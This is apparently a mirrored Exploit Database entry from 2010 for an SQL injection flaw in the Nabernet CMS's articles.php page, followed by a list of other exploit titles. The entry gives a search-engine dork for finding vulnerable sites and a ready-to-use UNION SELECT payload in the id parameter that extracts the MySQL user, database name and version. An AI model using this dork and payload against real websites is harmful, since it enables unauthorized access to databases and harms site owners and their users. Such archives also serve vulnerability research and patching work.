Nabernet – ‘articles.php’ SQL Injection

Exploit Database
42 阅读

作者： AtT4CKxT3rR0r1ST

日期： 2010-02-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11482/

Nabernet (articles.php) Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Home : www.sec-attack.com/vb [Sec Attack Team]
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "powered by Nabernet"

####################################################################

===[ Exploit ]===

www.site.com/articles.php?id=null[Sql]

www.site.com/articles.php?id=null'+and+1=2+union+select+null,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,null,null,null,null,null,null-- -


####################################################################

last Exploits
Nabernet – ‘articles.php’ SQL Injection的更多信息

Google Urchin 5.7.03 – Local File Inclusion：
OpenBMCS 2.4 – Server Side Request Forgery (SSRF) (Unauthenticated)：
Small-Cms – ‘hostname’ Remote PHP Code Injection：
Artica Web Proxy 3.06 – Remote Code Execution：
phpScheduleIt 1.2.12 – Multiple Cross-Site Scripting Vulnerabilities：
AUO SunVeillance Monitoring System 1.1.9e – Incorrect Access Control：
Zoho BugTracker – Multiple Persistent Cross-Site Scripting Vulnerabilities：
FiberHome VDSL2 Modem HG 150-UB – Authentication Bypass：